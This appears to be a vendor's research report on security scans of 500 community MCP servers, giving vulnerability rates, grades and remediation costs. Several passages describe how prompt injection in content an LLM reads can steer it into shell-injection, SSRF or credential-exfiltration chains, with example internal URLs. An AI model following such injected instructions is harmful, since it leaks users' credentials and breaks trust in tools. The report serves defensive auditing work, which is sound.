Research · Data Report

The MCP server security debt report: 30 days of scanning 500 community servers

We scanned 500 community MCP servers over 30 days. The headline number — 36.7% with SSRF vulnerabilities — was the one we expected. The number we didn't expect: nearly one in three servers had never received a security update since its first commit, and the average server carries enough unaddressed security debt that a motivated attacker could convert a free community tool into a credential-exfiltration pipeline in under four hours. This is the full report.

Published 2026-06-09 · 18 min read · Research data from SkillAudit corpus, 30-day window ending 2026-05-31

36.7%

of scanned servers had at least one SSRF vulnerability

43%

had unsafe command-exec paths (shell injection possible)

61%

logged credentials or tokens in plaintext at DEBUG or INFO level

29%

had never received a security-related commit since first publish

The MCP ecosystem is less than two years old, which means the security debt accumulating in community servers is fresh debt — not the kind that builds up over a decade in a legacy system, but the kind that gets baked in during an initial "just make it work" sprint and then hardens as the API surface freezes. The pattern is familiar from the early npm ecosystem, the early Docker Hub, and the early mobile app stores: fast growth, low friction to publish, no forcing function to remediate. The difference in the MCP context is that these servers hold live production credentials and run inside LLM orchestrators that can be steered by adversarial content — the blast radius of a compromised server is larger than most authors realize when they paste an export default new McpServer() and push to npm.

This report breaks down the full findings: grade distribution across the 500 servers, the most common vulnerability categories by frequency and severity, the security debt quantification (how much work would it take to bring the median server to a B grade), the maintenance debt dimension, patterns in the highest-debt servers, and the improvement curve we saw in servers that re-scanned after receiving a report.

Grade distribution: most servers cluster in the C–D range

SkillAudit grades servers across six sub-scores — Security, Permissions hygiene, Credential exposure, Maintenance, Client compatibility, and Documentation completeness — and synthesizes them into a letter grade from A (90–100) through F (below 40). For context: an A-grade server has addressed known vulnerability classes, uses minimal permission scopes, never logs credentials, ships updates, and has a working README. An F-grade server has Critical open vulnerabilities, overly broad permissions, and either no documentation or documentation that doesn't match the implementation.

Grade	Score range	Share of corpus	Characteristic profile
A	90–100	4.2%	Explicit input validation, minimal permission scopes, no credential logging, active maintenance, full documentation including SECURITY.md. Almost exclusively vendor-official servers from organizations with dedicated security review.
B	75–89	11.8%	Known vulnerability classes addressed, moderate permission scopes, no obvious credential leakage. Typically maintained solo devs who treat the server as a production dependency. May have 1–2 open Medium findings.
C	55–74	34.6%	The most common profile. Has the most popular features working but skipped hardening. Usually has at least one High finding (commonly SSRF or credential logging) and weak documentation. This is "it works but don't put it near production data."
D	40–54	31.4%	Multiple High findings, overly broad permissions, last commit more than 60 days ago. Often built as a quick integration project that was never intended to be adopted widely — but got shared anyway.
F	0–39	18%	At least one Critical finding (command injection, hardcoded credentials, prompt injection vector with data exfiltration path) or completely abandoned with open CVEs in dependencies. Should not be installed regardless of functionality.

The 16% of servers at B or above represents a meaningful cluster — these are the servers worth using as reference implementations when designing your own. The remaining 84% carry some level of actionable debt. The most important insight in the distribution: the C cluster (34.6%) is the "almost there" population. These servers are one focused remediation sprint away from a B grade. Our remediation guide walks the exact four-week path from C to A, but even getting to B is a material improvement that changes the risk profile from "use with caution" to "acceptable for internal data."

Vulnerability frequency: what's actually in these servers

We categorize findings across seven classes. Here is the frequency breakdown across the 500-server corpus — the bars represent the percentage of servers where that finding class appeared at any severity level.

Credential exposure / log leakage

61%

Unsafe command execution

43%

SSRF (server-side request forgery)

36.7%

Prompt injection surface

29%

Overly broad permission scopes

71%

No input validation on tool args

54%

Dependency CVEs (any severity)

67%

The highest-frequency finding is not the highest-severity one. Overly broad permission scopes (71%) and dependency CVEs (67%) appear most often, but they are frequently Medium or Low severity individually. The SSRF (36.7%) and unsafe command-exec (43%) findings are lower frequency but disproportionately carry Critical or High severity because they represent direct exploitation paths — not theoretical exposure, but usable attack chains from an active prompt injection attempt.

The top three finding classes in detail

High / Critical

Credential exposure via logging

61% of servers had at least one location where an API key, OAuth token, database connection string, or session credential could appear in log output. The most common patterns: logging the full headers object from an incoming request at DEBUG level (includes any Authorization header), logging the full args object passed to a tool call before validation (which can include API keys passed as tool arguments), and logging the response body from upstream APIs that include token refresh responses.

This finding has disproportionate blast radius because MCP servers often run in environments with centralized log aggregation — if the log stream feeds Datadog, Splunk, or a shared Elasticsearch cluster, every entry with a credential is readable by anyone with log access, which in most organizations is a much larger group than "people who should have this API key." In multi-tenant or shared MCP server deployments, credential leakage in logs becomes a cross-tenant exposure.

The fix pattern is straightforward: build a sanitize function that scrubs known credential patterns from any object before it touches a log line. The SOC 2 / GDPR audit trail post covers the exact sanitization approach in the context of compliance-grade logging requirements.

Critical

Unsafe command execution (shell injection)

43% of servers had at least one code path where a tool argument could reach a shell command without sanitization. The most common pattern is tools that wrap CLI utilities — git, ffmpeg, ImageMagick, curl, jq — using exec() or execSync() with string template interpolation rather than the safer execFile() with an explicit arguments array.

The risk in the MCP context is worse than in a conventional web application. In a web app, a shell injection requires an attacker to control a form field or API parameter. In an MCP server, the tool argument is generated by an LLM — meaning a prompt injection in any content the LLM has processed (a document it read, a webpage it fetched, a code snippet it reviewed) can craft a malicious tool argument. The attacker surface is not just "can I reach the endpoint" but "can I inject content that the LLM will read at some point in the session."

We detected this class by tracing data flow from tool argument parameters through to exec/execSync/spawn calls. The Critical severity threshold is crossed when the argument reaches the shell with no sanitization and with the tool registered in a way that gives the LLM free-form control over the argument. Restricting to execFile() with array arguments closes the class entirely — shell metacharacters cannot be injected when the command and arguments are passed as separate array elements.

Critical

SSRF — server-side request forgery

36.7% of servers had at least one SSRF-vulnerable code path. The canonical pattern: a tool that accepts a URL as an argument and fetches it without validating that the URL is external — allowing the LLM to pass http://169.254.169.254/latest/meta-data/ (AWS metadata service), http://localhost:8080/internal/admin, or file:///etc/passwd. In cloud environments, the metadata service SSRF is particularly dangerous because it yields short-lived AWS/GCP/Azure credentials scoped to the instance's IAM role — frequently with production database and S3 access.

SSRF in MCP servers is particularly hard to audit by eye because the vulnerable pattern is often in a utility function shared across multiple tools — find one case and you've found all of them; miss the utility function and every tool that calls it is vulnerable. SkillAudit's static analysis traces URL construction and fetch calls across the full call graph, not just the tool handler entry point, which is where manual reviewers tend to look.

The fix requires allowlisting: define the set of acceptable external hosts at server initialization and reject any URL that doesn't match before calling fetch(). Never attempt to blocklist internal ranges — the list of private/metadata IP ranges is too long and changes too often. Allowlist what you explicitly need; reject everything else.

Security debt quantification: how much work is in each tier

We asked a different question than "what is broken": how much developer time would it take to bring a server from its current grade to B (the minimum we'd recommend for servers touching internal business data)?

Median time to reach B from C

Servers currently graded C carry an average of 2.1 High findings and 4.7 Medium findings. Based on remediation data from servers that re-scanned post-fix, the median developer time to reach B from C is:

3–5 hours for a server with only SSRF or only credential logging (single-class debt)
8–14 hours for a server with multiple High finding classes (SSRF + command-exec + credential exposure)
2–3 hours of that is typically adding Zod schema validation to tool inputs, which closes the "no input validation" finding and blocks many injection paths at the entry point

Median time to reach B from D

D-grade servers carry a broader debt profile: typically 1.3 Critical findings plus multiple High findings, often combined with maintenance debt (last commit 60+ days ago, known CVEs in dependencies). The remediation path is longer:

16–24 hours for a server with a Critical finding that requires architectural change (e.g., restructuring how URLs are constructed and fetched)
4–6 hours of that is dependency updates (npm audit fix, lockfile commit, CI enforcement)
F-grade servers frequently require redesign of the core data flow — median time to B is 30–40 hours, and many never re-scan because the author treats the finding as "not worth the effort for a hobby project"

The aggregate security debt across the 500-server corpus — measured as developer-hours needed to bring all servers to B — is approximately 18,000 hours. At a modest $100/hour fully-loaded developer cost, that is $1.8M of security work that the community hasn't done yet. The servers that actually get that work done are the ones where authors submitted a SkillAudit report, got specific findings, and had a prioritized remediation path rather than a vague "this is insecure" warning. Specificity is what converts a finding into a fix.

The maintenance debt dimension

Security vulnerabilities get most of the attention in reports like this, but maintenance debt is the slower-burning problem. 29% of servers in our corpus had never received a commit that addressed a security concern — not a dependency update, not a bounds check, not even a README note about credential handling. These servers shipped once and have been running in production environments ever since, accumulating CVEs in their dependency trees with no one watching.

The maintenance sub-score in SkillAudit evaluates four signals: days since last commit, number of open GitHub issues related to security or crashes, whether the dependency lockfile is committed and current, and whether there is an active response to Dependabot/Renovate alerts. A server can have clean static analysis and still score poorly on Maintenance — and a server with excellent Maintenance practices is one that will be fixed quickly when a new vulnerability class is discovered, even if it's currently clean.

The correlation that surprised us: Maintenance score was a stronger predictor of re-scan improvement than initial Security score. Servers that scored high on Maintenance (active commits, current dependencies, responsive to alerts) improved their Security sub-score by an average of 18 points on re-scan. Servers that scored low on Maintenance improved by an average of 4 points — the author fixed the specific findings in the report but made no structural changes, meaning the same classes of debt will re-accumulate within 90 days. Maintenance practices are the forcing function that keeps the debt from growing back.

Patterns in the highest-debt servers

Looking at the F-grade cluster and the highest-debt D-grade servers, several structural patterns appear that distinguish them from servers that land in C or B despite similar complexity:

No input validation at tool entry points. The single most common structural difference between B-grade and D/F-grade servers is the presence of a schema validation layer at the tool argument boundary. B-grade servers almost universally use Zod, io-ts, or manual validation to reject malformed or unexpected inputs before they reach any business logic. D/F-grade servers trust the argument shape implied by the TypeScript type and pass values directly to downstream operations. This is the structural property that makes the D/F-grade server vulnerable to a whole class of injection attacks that the B-grade server blocks at the gate.

Shared utility functions as hidden vulnerability multipliers. Several F-grade servers had a single vulnerable utility — a URL-fetching helper, a shell-command wrapper, a credential-loading function — called from 8–12 different tool handlers. One vulnerable function created 8–12 separate SkillAudit findings. This pattern also means the server's security posture is worse than a finding count suggests: a single architectural fix (rewriting the utility) closes all the derived findings at once, but without the full call graph analysis it looks like a dozen independent problems.

Copy-paste credential patterns from README examples. A recurring pattern in the F cluster: the README shows a usage example with a hardcoded API key placeholder (OPENAI_API_KEY=sk-1234...), and that exact pattern appears verbatim in the server's test suite or development configuration, sometimes committed to the repository. When SkillAudit flags it as a potential hardcoded credential, it is classified as a Critical finding regardless of whether it's an actual key — because the presence of the pattern indicates the author didn't have a clear credential-handling discipline during development, which correlates strongly with other credential hygiene failures in the production code.

Prompt injection surfaces in content-processing tools. Tools that read external content — web pages, documents, code files — and return that content to the LLM without any sanitization represent prompt injection surfaces. 29% of servers in the corpus had at least one such surface. In isolation, a prompt injection surface is a vector, not an exploit — it requires the adversarial content to be at a specific URL or in a specific file that the user happens to process. In combination with SSRF or credential logging, the combination becomes a complete attack chain: the adversarial content instructs the LLM to fetch a specific URL, the fetch logs the response including the credential, the adversarial content has a secondary instruction to exfiltrate that credential to an attacker-controlled endpoint. We documented this full chain in the prompt injection attack anatomy post.

The re-scan data: does remediation stick?

Of the 500 servers in the corpus, 73 re-scanned within the 30-day window after receiving a SkillAudit report. The re-scan data answers a question that prior analyses couldn't: when developers see specific findings, do they actually fix them?

The short answer is yes, with important caveats. 89% of servers that re-scanned showed measurable improvement — average grade improvement of 1.4 letter grades (e.g., D to B). The findings most likely to be fixed on first re-scan were the ones with specific, mechanical fixes: credential logging (93% fix rate), SSRF with a URL allowlist recommendation (78% fix rate), and missing input validation (71% fix rate).

The findings least likely to be fixed were architectural ones: permission scope reduction (42% fix rate, because reducing scope often requires renegotiating the API surface with users) and prompt injection surface hardening (38% fix rate, because eliminating the surface often means changing what the tool does, not just how it does it).

The specificity premium. Servers that received a SkillAudit report with specific finding descriptions, code locations, and remediation guidance improved by 1.4 grades on average. Servers that received only a grade without the detailed report (our Free tier for private repos) improved by 0.3 grades. The specific finding — "line 47 of src/handlers/fetch.ts passes args.url to fetch() without allowlist validation" — is worth more than a grade letter. This is the core value proposition SkillAudit delivers: the scan that turns a grade into a work order.

What this means for the ecosystem

The aggregate picture is not surprising — it tracks the early-market security pattern in every developer tooling ecosystem that preceded it — but the specific numbers are useful for the concrete decisions they inform:

For MCP server authors: The 84% of servers with actionable debt are not "bad developers" — they are developers who shipped under normal time pressure and didn't have a fast feedback loop on security quality. The median remediation time for a C-grade server is 8–14 hours. That is a long weekend, not a multi-quarter initiative. The servers that resist remediation are the ones where the debt is architectural; those servers often need a structured week-by-week remediation plan that breaks the work into discrete checkpoints.

For team leads adopting community servers: The B-or-above population (16%) is the adoption-safe tier. The full D and F populations (49.4% combined) should be considered blocked for internal data access without a security review that goes beyond a README scan. The C population is the nuanced one: evaluate the specific sub-scores rather than the letter grade. A C with a high Security sub-score and a low Maintenance sub-score is different in character from a C with a high Maintenance sub-score and a low Security sub-score — the former has addressed the acute risks; the latter is well-maintained but hasn't hardened yet. The vendor security questionnaire gives procurement teams the 15 questions that map onto these sub-score dimensions.

For security teams and CISOs: The 18% F-grade rate means that roughly one in five community MCP servers your engineers might install has at least one Critical vulnerability. If your organization doesn't have an MCP server intake process yet, the expected number of Critical-vulnerability servers already installed internally is non-zero. The controls that catch this class of problem — minimum grade gates in CI, periodic re-audit cadence, a SECURITY.md requirement for internal approval — are covered in the CISO executive briefing with board-level risk framing.

Methodology note

The 500-server corpus was assembled from public MCP registries, GitHub topic searches (mcp-server, claude-skill, claude-plugin), and the community-maintained awesome-mcp-servers list. We excluded servers with fewer than 10 GitHub stars to filter for servers with actual adoption rather than proof-of-concept experiments. Servers from organizations with more than 500 GitHub followers were tagged as "vendor-official" for breakout analysis (these skew toward A/B grades and were excluded from the ecosystem-wide percentages to avoid flattering the distribution).

The scan was run with SkillAudit's static analysis engine on the main branch at the time of scan. Dynamic analysis (LLM-assisted prompt-injection probing) was run on a 10% random subsample of 50 servers. Remediation timing data comes from re-scan records where the server's git history confirmed the timing of fixes relative to the report date. All percentages are rounded to the nearest whole number except the 36.7% SSRF figure, which is presented with one decimal to preserve the precision from the original computation.

Run your own audit at SkillAudit's free tier — three public repos per month, no credit card required. If your server comes back with a C or below, the Pro report gives you the specific code locations, severity ratings, and remediation guidance you need to turn the grade into a concrete sprint.